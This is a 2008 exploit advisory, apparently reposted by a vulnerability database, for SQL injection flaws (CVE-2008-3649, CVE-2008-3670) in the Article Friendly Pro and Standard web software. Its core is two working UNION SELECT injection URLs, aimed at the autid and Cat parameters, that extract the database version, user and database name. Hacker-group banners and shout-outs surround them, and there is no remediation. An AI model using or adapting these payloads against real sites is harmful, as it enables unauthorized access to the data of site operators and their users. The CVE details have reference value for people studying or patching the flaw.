Bug: Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability (WLB-2008080148 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability
 Credit: Mr.SQL
 Date: 2008.08.15
 CWE: CWE-89 (Show similar)
 CVE: CVE-2008-3649 (Show details)
CVE-2008-3670 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## Article Friendly Pro ( categorydetail.php Cat )
##
## Article Friendly Standard ( authordetail.php autid )
##
## http://www.articlefriendly.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
##
## -[[: Exploites :]]-
##
## [[ Article Friendly Pro ]]
www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0/*
##
## [[ Article Friendly Standard ]]
www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
##
########################
########################

#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-

:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

References:

http://www.milw0rm.com/exploits/6167

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com